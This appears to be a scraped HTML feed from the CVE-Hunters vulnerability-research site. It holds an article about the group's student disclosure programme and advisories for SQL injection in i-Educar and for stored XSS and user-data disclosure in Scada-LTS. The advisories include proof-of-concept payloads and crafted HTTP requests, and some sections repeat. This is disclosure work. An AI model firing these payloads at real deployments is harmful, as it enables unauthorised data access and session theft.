class="n">cc45760590da203c5fc3568ecbabd66</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">routes</span><span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">2</span><span class="n">C</span><span class="o">%</span><span class="mi">22</span><span class="n">tab</span><span class="o">--</span><span class="mi">7</span><span class="n">a2ac3477f8ad14aa750831441325a16</span><span class="o">%</span><span class="mi">22</span><span class="p">:</span><span class="o">%</span><span class="mi">22</span><span class="n">data</span><span class="o">.</span><span class="n">facebook</span><span class="o">%</span><span class="mi">22</span><span class="p">};</span> <span class="n">i_educar_session</span><span class="o">=</span><span class="n">hRnVO9PXmAH7dVAd7DsTeTgExwM6ccdtZZaCcpob</span> </span></span><span class="line"><span class="cl"><span class="n">Upgrade</span><span class="o">-</span><span class="n">Insecure</span><span class="o">-</span><span class="n">Requests</span><span class="p">:</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"><span class="n">Sec</span><span class="o">-</span><span class="n">Fetch</span><span class="o">-</span><span class="n">Dest</span><span class="p">:</span> <span class="n">document</span> </span></span><span class="line"><span class="cl"><span class="n">Sec</span><span class="o">-</span><span class="n">Fetch</span><span class="o">-</span><span class="n">Mode</span><span class="p">:</span> <span class="n">navigate</span> </span></span><span class="line"><span class="cl"><span class="n">Sec</span><span class="o">-</span><span class="n">Fetch</span><span class="o">-</span><span class="n">Site</span><span class="p">:</span> <span class="n">same</span><span class="o">-</span><span class="n">origin</span> </span></span><span class="line"><span class="cl"><span class="n">Sec</span><span class="o">-</span><span class="n">Fetch</span><span class="o">-</span><span class="n">User</span><span class="p">:</span> <span class="err">?</span><span class="mi">1</span> </span></span><span class="line"><span class="cl"><span class="n">Priority</span><span class="p">:</span> <span class="n">u</span><span class="o">=</span><span class="mi">0</span><span class="p">,</span> <span class="n">i</span> </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <p><img src="/p/cve-2025-9236/image.png" width="1149" height="1030" srcset="/p/cve-2025-9236/image_hu_4ffda49109aad67b.png 480w, /p/cve-2025-9236/image_hu_2bdafcc06acaa448.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="111" data-flex-basis="267px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9236.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9236.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 20 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/articles/cve-hunters---the-journey-of-aspiring-vulnerability-researchers/ https://www.cvehunters.com/articles/cve-hunters---the-journey-of-aspiring-vulnerability-researchers/ <h2 id="introduction">Introduction </h2><p style="text-align: justify;">At <b><a href="https://defcon.org/html/defcon-33/dc-33-index.html" target="_blank">#DEFCON33</a></b>, one of the most prestigious security conferences in the world, <b><a href="https://www.linkedin.com/in/nmmorette" target="_blank">Natan Morette</a></b> presented the <b><a href="https://www.cvehunters.com/" target="_blank">CVE-Hunters</a></b> project, which represents a fundamental change in the way we approach cybersecurity education, transforming the classic dilemma of lack of experience into a concrete learning opportunity.</br></br>With 116 published CVEs, 170 discovered vulnerabilities, and 20 active members in less than a year, <b><a href="https://www.cvehunters.com/" target="_blank">CVE-Hunters</a></b> is a replicable model that is changing lives and improving the security of systems used by millions of people.</br></br>During his classes, <b><a href="https://www.linkedin.com/in/nmmorette" target="_blank">Natan</a></b> constantly faced the same question:</p><h2 id="introduction">Introduction </h2><p style="text-align: justify;">At <b><a href="https://defcon.org/html/defcon-33/dc-33-index.html" target="_blank">#DEFCON33</a></b>, one of the most prestigious security conferences in the world, <b><a href="https://www.linkedin.com/in/nmmorette" target="_blank">Natan Morette</a></b> presented the <b><a href="https://www.cvehunters.com/" target="_blank">CVE-Hunters</a></b> project, which represents a fundamental change in the way we approach cybersecurity education, transforming the classic dilemma of lack of experience into a concrete learning opportunity.</br></br>With 116 published CVEs, 170 discovered vulnerabilities, and 20 active members in less than a year, <b><a href="https://www.cvehunters.com/" target="_blank">CVE-Hunters</a></b> is a replicable model that is changing lives and improving the security of systems used by millions of people.</br></br>During his classes, <b><a href="https://www.linkedin.com/in/nmmorette" target="_blank">Natan</a></b> constantly faced the same question:</p> <blockquote> <p>“How do I gain real-world experience in cybersecurity?”</p> </blockquote> <h2 id="the-problem-of-experience-in-cybersecurity">The Problem of Experience in Cybersecurity </h2><p style="text-align: justify;">The answer included two options: <ul><li>Participating in CTFs:</li></ul></p> <p style="text-align: justify;">CTFs create a <i>"competition mindset"</i> that's different from the real world, focusing on solving artificial challenges that don't simulate the complexity of production systems.</p> <p style="text-align: justify;"><ul><li>Studying for certifications:</li></ul></p> <p style="text-align: justify;">Certifications, in turn, are costly and focus on theory without immediate practical application.</p> <p style="text-align: justify;">The job market perpetuates this paradox. Even <i>"junior"</i> positions require prior experience, seeking professionals with experience in vulnerability assessment, practical knowledge of responsible disclosure, a demonstrable portfolio of security findings, and an understanding of business relevance.</p> <h2 id="the-cve-hunters-philosophy">The CVE-Hunters Philosophy </h2><p>Was born from the simple premise:</p> <blockquote> <p><em><strong>“We got tired of waiting for opportunities, so we created our own.”</strong></em></p> </blockquote> <p style="text-align: justify;">The difference lies in the selection of Open-Source projects, based on <b>real social benefit</b>, prioritizing projects used by organizations that serve vulnerable populations.</p> <h2 id="1st-wave--wegia-project">1st Wave – WeGIA Project </h2><p style="text-align: justify;">In November 2024, with just three people (<b><a href="https://www.linkedin.com/in/nmmorette" target="_blank">Natan</a></b> and two students), they chose <b><a href="https://github.com/LabRedesCefetRJ/WeGIA" target="_blank">#WeGIA</a></b> as their first target. <b><a href="https://github.com/LabRedesCefetRJ/WeGIA" target="_blank">WeGIA</a></b> is a Brazilian Open-Source platform used by social programs and NGOs, including orphanages, nursing homes, and adoption centers. The choice made sense: it had direct social relevance, accessible code, Brazilian developers facilitating communication, and it was a critical system protecting data from vulnerable populations.</br></br>The 1st Wave resulted in <b>48 published CVEs</b> with an impressive distribution:</p> <ul> <li>34 Cross-Site Scripting (70.8%);</li> <li>8 SQL Injection (16.7%);</li> <li>2 Broken Access Control (4.2%);</li> <li>1 Remote Code Execution (2.1%);</li> <li>1 Open Redirect (2.1%);</li> <li>1 Denial of Service (2.1%);</li> <li>1 CSRF in sensitive action (2.1%).</li> </ul> <p style="text-align: justify;">A special highlight was <b><a href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank">Elisangela Silva de Mendonça</a></b>, a student who single-handedly discovered <b>29 of the 48 CVEs (60% of the total)</b>. Her journey perfectly exemplifies the project's potential: she started as a beginner in vulnerability research, developed a systematic analysis methodology, landed her first job in cybersecurity, and today serves as a reference point for new members within the group.</br></br>The impacts went beyond the number of CVEs published, creating ripples of <b>real change in the community</b>. The first two students landed their first jobs in cybersecurity, validating in practice that the experience they gained was recognized by the market. Simultaneously, <b><a href="https://github.com/LabRedesCefetRJ/WeGIA" target="_blank">WeGIA</a></b> developers not only fixed the discovered vulnerabilities but also implemented <b>best security practices</b> throughout the project. What began as a one-off collaboration evolved into a lasting relationship, with other independent researchers feeling inspired to contribute to the project.</p> <h2 id="2nd-wave--portabilis-projects">2nd Wave – Portabilis Projects </h2><p style="text-align: justify;">This initial validation paved the way for an ambitious expansion. With 10 new students, the team identified its next challenge: <b><a href="https://portabilis.com.br/" target="_blank">#Portabilis</a></b>, a company that develops Open-Source software for educational management.</br></br><b><a href="https://github.com/portabilis/i-educar" target="_blank">i-Educar</a></b> represents an impressive story in terms of social reach:</p> <ul> <li>The system connects more than 80 Brazilian municipalities;</li> <li>Manages 2,050 schools;</li> <li>Impacts 500,000 students.</li> </ul> <blockquote> <p>Even the Brazilian Air Force uses it for critical simulations.</p> </blockquote> <p style="text-align: justify;">The discovery of <b><a href="https://www.cve.org/CVERecord?id=CVE-2025-8789" target="_blank">CVE-2025-8789</a></b> illustrates how simple vulnerabilities can have devastating consequences.</br>This flaw allowed <b>unprivileged users to change student grades</b> through direct API calls. The irony was cruel: while the interface blocked unauthorized actions, the APIs operated as open doors, validating only whether the user was logged in, ignoring their specific permissions. The process revealed the systematic methodology developed: analysis of limited flows, request interception, bypass testing, and confirmation of true severity.</p> <p>The results of the 2nd Wave reflect scale and depth:</p> <ul> <li>42 vulnerabilities in <strong><a class="link" href="https://github.com/portabilis/i-educar" target="_blank" rel="noopener" >i-Educar</a></strong>;</li> <li>19 in <strong><a class="link" href="https://github.com/portabilis/i-diario" target="_blank" rel="noopener" >i-Diário</a></strong>;</li> <li>8 published CVEs;</li> <li>53 vulnerabilities in the disclosure process.</li> </ul> <h2 id="3rd-wave--diversification-and-maturity">3rd Wave – Diversification and Maturity </h2><p style="text-align: justify;">The 3rd Wave marks remarkable maturity, managing <b>eight simultaneous projects</b>, from continuity with <b><a href="https://github.com/LabRedesCefetRJ/WeGIA" target="_blank">WeGIA</a></b> and <b><a href="https://github.com/portabilis/i-educar" target="_blank">i-Educar</a></b> to diversification into <b><a href="https://github.com/centreon/centreon" target="_blank">Centreon</a></b>, <b><a href="https://github.com/getgrav/grav" target="_blank">Grav</a></b>, <b><a href="https://github.com/indico/indico" target="_blank">Indico</a></b>, and <b><a href="https://github.com/SCADA-LTS/Scada-LTS" target="_blank">Scada-LTS</a></b>. Among all the discoveries, the work on <b><a href="https://github.com/SCADA-LTS/Scada-LTS" target="_blank">Scada-LTS</a></b> stands out as an almost cinematic moment. This system, used by the <b><a href="https://www.itaipu.gov.br/" target="_blank">Itaipu Dam</a></b> to simulate cyberattacks on critical infrastructure, revealed two XSS vulnerabilities (<b><a href="https://www.cve.org/CVERecord?id=CVE-2025-7728" target="_blank">CVE-2025-7728</a></b> and <b><a href="https://www.cve.org/CVERecord?id=CVE-2025-7729" target="_blank">CVE-2025-7729</a></b>) in <b>less than a minute</b>, demonstrating the refined efficiency of the methodology.</p> <h2 id="structured-methodology">Structured Methodology </h2><p style="text-align: justify;">The process includes:<ul><li>Careful selection (1-2 days) assessing social impact and maintainer responsiveness;</li><li>In-depth reconnaissance (3-5 days) mapping architecture and configuring environments;</li><li>Intensive vulnerability assessment (15-20 days) combining static analysis with dynamic testing;</li><li>PoC development (2-3 days);</li><li>Responsible disclosure (5-10 days), involving careful diplomacy.</li></ul></p> <p style="text-align: justify;">The toolkit evolved organically: SonarQube and Semgrep for static analysis, Burp Suite and OWASP ZAP for dynamic testing, and custom Python scripts for specific gaps. Reporting via VulnDB, GitHub Security Advisories, and standardized templates ensured consistency and increased acceptance rates.</br></br>Each Wave brought unique challenges. The technological diversity required specialized expertise in record time. The interpersonal challenges, uncooperative maintainers, variable response times, and different levels of security maturity taught strategic patience and stakeholder management. Two lessons emerged as fundamental:</p> <p style="text-align: justify;"><ul><li>Detailed documentation with screenshots and a clear articulation of business relevance;</li><li>Collaboration exponentially amplifies results through peer review and mentoring.</li></ul></p> <h2 id="educational-and-community-legacy">Educational and Community Legacy </h2><p style="text-align: justify;">The educational legacy developed impressive technical skills, systematic code analysis, intuitive understanding of attack surfaces, development of functional PoCs, and professional skills such as multiple project management, stakeholder relationships, and professional documentation. The results validated the original hypothesis: multiple members landed their first jobs with demonstrable portfolios and community recognition through public CVEs.</br></br>The contribution to the community extended beyond fixing vulnerabilities, establishing security practices in projects that previously ignored them, inspiring similar groups, and demonstrating the viability of collaborative models.</p> <h2 id="the-future-of-cve-hunters">The Future of CVE-Hunters </h2><p style="text-align: justify;">The future includes:</p> <ul> <li>Expansion through University partnerships;</li> <li>A formal mentoring program;</li> <li>The development of proprietary tools.</li> </ul> <p style="text-align: justify;">For aspiring security researchers, the lessons are clear:</p> <ul> <li>Initial focus on a single project with a measurable impact;</li> <li>Sufficient time commitment, meticulous documentation;</li> <li>Unwavering commitment to responsible disclosure.</li> </ul> <p style="text-align: justify;">Educators can revolutionize teaching by replacing simulations with engagement with real projects. The open source community can enhance results by establishing clear reporting channels and promoting a security-first culture.</p> <h2 id="conclusion">Conclusion </h2><p style="text-align: justify;"><b><a href="https://www.cvehunters.com/" target="_blank">CVE-Hunters</a></b> project has democratized access to real-world security expertise, creating a replicable path for <b>anyone</b> who wants to make a difference.</br></br>The numbers:</p> <ul> <li>116 published CVEs;</li> <li>20 active members;</li> <li>Millions of users impacted!</li> </ul> <p style="text-align: justify;">Quantify success, but the qualitative effect is more significant:</p> <blockquote> <p><em><strong>You don’t need to wait for opportunities when you can create your own.</strong></em></p> </blockquote> <p style="text-align: center;">"We weren't just looking for bugs, we were looking for a way to contribute"</p> <p style="text-align: justify;">And they have contributed profoundly to their own futures, to the security of systems that protect vulnerable populations, and to the next generation of security researchers armed with a tested roadmap to turn curiosity into a career.</p> <h2 id="reference">Reference </h2><p style="text-align: justify;">Presentation "From Noobz to Vulnerability Researchers: The Journey of the CVE-Hunters" - DEF CON 33, 2025.</p> <h2 id="presentation-author">Presentation Author </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <h2 id="article-written-by">Article written by </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 20 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9137/ https://www.cvehunters.com/p/cve-2025-9137/ <h2 id="cve-2025-9137-cross-site-scripting-xss-stored-endpoint-publisher_editshtm-parameter-alias">CVE-2025-9137: Cross-Site Scripting (XSS) Stored endpoint <code>publisher_edit.shtm</code> parameter <code>alias</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9137" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9137</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>publisher_edit.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>alias</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>publisher_edit.shtm</code></p><h2 id="cve-2025-9137-cross-site-scripting-xss-stored-endpoint-publisher_editshtm-parameter-alias">CVE-2025-9137: Cross-Site Scripting (XSS) Stored endpoint <code>publisher_edit.shtm</code> parameter <code>alias</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9137" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9137</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>publisher_edit.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>alias</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>publisher_edit.shtm</code></p> <p>Parameter: <code>alias</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>alias</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(1)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9137/image.png" width="775" height="485" srcset="/p/cve-2025-9137/image_hu_5233a8cd4b2f18d9.png 480w, /p/cve-2025-9137/image_hu_94453de285483063.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="159" data-flex-basis="383px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9137.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9137.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 19 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9138/ https://www.cvehunters.com/p/cve-2025-9138/ <h2 id="cve-2025-9138-cross-site-scripting-xss-stored-endpoint-pointhierarchynew-via-path-parameter">CVE-2025-9138: Cross-Site Scripting (XSS) Stored endpoint <code>pointHierarchy/new/</code> via path parameter </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9138" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9138</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>pointHierarchy/new/</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts via path parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>pointHierarchy/new/</code></p><h2 id="cve-2025-9138-cross-site-scripting-xss-stored-endpoint-pointhierarchynew-via-path-parameter">CVE-2025-9138: Cross-Site Scripting (XSS) Stored endpoint <code>pointHierarchy/new/</code> via path parameter </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9138" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9138</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>pointHierarchy/new/</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts via path parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>pointHierarchy/new/</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs via path parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(10)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9138/image.png" width="667" height="315" srcset="/p/cve-2025-9138/image_hu_a00d5e9a8a813e04.png 480w, /p/cve-2025-9138/image_hu_197f1e93b2a183a9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="211" data-flex-basis="508px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9138.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9138.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 19 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9139/ https://www.cvehunters.com/p/cve-2025-9139/ <h2 id="cve-2025-9139-sensitive-user-information-disclosure-via-watchlistdwrinitdwr-endpoint">CVE-2025-9139: Sensitive User Information Disclosure via <code>WatchListDwr.init.dwr</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9139" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9139</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A vulnerability was identified in the <code>WatchListDwr.init.dwr</code> endpoint of SCADA-LTS that allows any authenticated user, even with minimal permissions, to access sensitive user information including usernames, emails, phone numbers, and admin status. This flaw constitutes an <b>Information Disclosure</b> issue and could be used to facilitate further attacks such as phishing, privilege escalation, or social engineering.</p> <h2 id="details">Details </h2><p style="text-align: justify;"> <ul> <li><b>Vulnerable Endpoint:</b> <code>POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr</code></li> <li><b>Authentication Required:</b> Yes (low-privileged user)</li> <li><b>Affected Parameter:</b> N/A (static DWR call)</li> <li><b>Impact Type:</b> Information Disclosure</li> </ul> </p><h2 id="cve-2025-9139-sensitive-user-information-disclosure-via-watchlistdwrinitdwr-endpoint">CVE-2025-9139: Sensitive User Information Disclosure via <code>WatchListDwr.init.dwr</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9139" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9139</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A vulnerability was identified in the <code>WatchListDwr.init.dwr</code> endpoint of SCADA-LTS that allows any authenticated user, even with minimal permissions, to access sensitive user information including usernames, emails, phone numbers, and admin status. This flaw constitutes an <b>Information Disclosure</b> issue and could be used to facilitate further attacks such as phishing, privilege escalation, or social engineering.</p> <h2 id="details">Details </h2><p style="text-align: justify;"> <ul> <li><b>Vulnerable Endpoint:</b> <code>POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr</code></li> <li><b>Authentication Required:</b> Yes (low-privileged user)</li> <li><b>Affected Parameter:</b> N/A (static DWR call)</li> <li><b>Impact Type:</b> Information Disclosure</li> </ul> </p> <p style="text-align: justify;">By issuing a crafted POST request to the vulnerable endpoint, a low-privileged user is able to retrieve detailed information of all users in the system. The backend responds with a full JavaScript object containing data such as usernames, emails, admin flags, and phone numbers.</p> <h3 id="sample-request">Sample Request: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr HTTP/1.1 </span></span><span class="line"><span class="cl">Host: kubernetes.docker.internal:8080 </span></span><span class="line"><span class="cl">Content-Type: text/plain </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">callCount=1 </span></span><span class="line"><span class="cl">page=/Scada-LTS/watch_list.shtm </span></span><span class="line"><span class="cl">httpSessionId= </span></span><span class="line"><span class="cl">scriptSessionId=XYZ123456789 </span></span><span class="line"><span class="cl">c0-scriptName=WatchListDwr </span></span><span class="line"><span class="cl">c0-methodName=init </span></span><span class="line"><span class="cl">c0-id=0 </span></span><span class="line"><span class="cl">batchId=1 </span></span></code></pre></td></tr></table> </div> </div><h3 id="sample-response-snippet">Sample Response Snippet:: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">javascript </span></span><span class="line"><span class="cl">s7.admin=true; </span></span><span class="line"><span class="cl">s7.email="admin@yourMangoDomain.com"; </span></span><span class="line"><span class="cl">s7.username="admin"; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">s8.admin=false; </span></span><span class="line"><span class="cl">s8.email="anonymous@mail.com"; </span></span><span class="line"><span class="cl">s8.username="anonymous"; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">s11.admin=false; </span></span><span class="line"><span class="cl">s11.email="user1@x.com"; </span></span><span class="line"><span class="cl">s11.phone="13212313131"; </span></span><span class="line"><span class="cl">s11.username="user1"; </span></span></code></pre></td></tr></table> </div> </div><h2 id="poc">PoC </h2><h3 id="authenticate-as-any-valid-low-privileged-user">Authenticate as any valid low-privileged user. </h3><p><img src="/p/cve-2025-9139/image.png" width="1902" height="320" srcset="/p/cve-2025-9139/image_hu_c33d08b2cce4521c.png 480w, /p/cve-2025-9139/image_hu_7747a0e6ad4d8864.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="594" data-flex-basis="1426px" /></p> <h3 id="send-the-above-post-request-to-scada-ltsdwrcallplaincallwatchlistdwrinitdwr">Send the above POST request to <code>/Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr</code> </h3><p><img src="/p/cve-2025-9139/image-1.png" width="1680" height="776" srcset="/p/cve-2025-9139/image-1_hu_ff5188c788d16204.png 